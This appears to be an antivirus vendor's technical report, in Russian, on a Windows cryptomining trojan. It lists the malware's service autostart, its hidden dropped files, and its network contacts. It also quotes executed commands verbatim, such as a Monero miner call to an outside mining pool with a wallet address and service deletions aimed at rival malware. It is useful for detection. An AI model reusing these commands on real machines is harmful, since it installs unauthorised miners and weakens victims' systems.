Техническая информация
Для обеспечения автозапуска и распространения:
Создает следующие сервисы:
- [<HKLM>\SYSTEM\ControlSet001\Services\Services] 'Start' = '00000002'
- [<HKLM>\SYSTEM\ControlSet001\Services\Services] 'ImagePath' = '%ProgramFiles%\MSBuild\MSBuild.exe'
Изменения в файловой системе:
Создает следующие файлы:
- %ProgramFiles%\MSBuild\MSBuild.exe
- %ProgramFiles%\MSBuild\Services.exe
- %CommonProgramFiles%\Services\WmiApSvr.exe
- %APPDATA%\Microsoft\Protect\CREDHIST
- %APPDATA%\Microsoft\Crypto\RSA\S-1-5-21-2052111302-484763869-725345543-1003\ec702f375e1b12d218f67ab9ef19ca23_23ef5514-3059-436f-a4a7-4cefaab20eb1
Присваивает атрибут 'скрытый' для следующих файлов:
- %ProgramFiles%\MSBuild\MSBuild.exe
- %CommonProgramFiles%\Services\WmiApSvr.exe
Перемещает следующие файлы:
- %ProgramFiles%\MSBuild\Services.exe в %ProgramFiles%\MSBuild\[9f5849bed098fc743e0a20cbc3081a3a]
Подменяет следующие файлы:
- %ProgramFiles%\MSBuild\Services.exe
Сетевая активность:
Подключается к:
- 'xm#.#sa-138.com':80
UDP:
- DNS ASK xm#.#sa-138.com
Другое:
Создает и запускает на исполнение:
- '%ProgramFiles%\MSBuild\Services.exe'
- '%CommonProgramFiles%\Services\WmiApSvr.exe' -a cryptonight -o stratum+tcp://xmr.usa-138.com:80 -u 49e9B8HxzSbMWsNbMs72aVe78U9CCE2DAM5aDJYNeccWNvWiKfrPaGeewmTAjj6nt6Bqzob4zaRjLXfpW1WfRMnzEAQBHy7 -p x --donate-level=1
Запускает на исполнение:
- '<SYSTEM32>\sc.exe' delete mssecsvc2.0
- '<SYSTEM32>\sc.exe' delete mssecsvc2.1
- '<SYSTEM32>\sc.exe' delete ClipBooks
- '<SYSTEM32>\sc.exe' delete Windows_Update
- '<SYSTEM32>\cacls.exe' %WINDIR%\Fonts\*.exe /e /d everyone
- '<SYSTEM32>\netsh.exe' ipsec static add policy name=Block
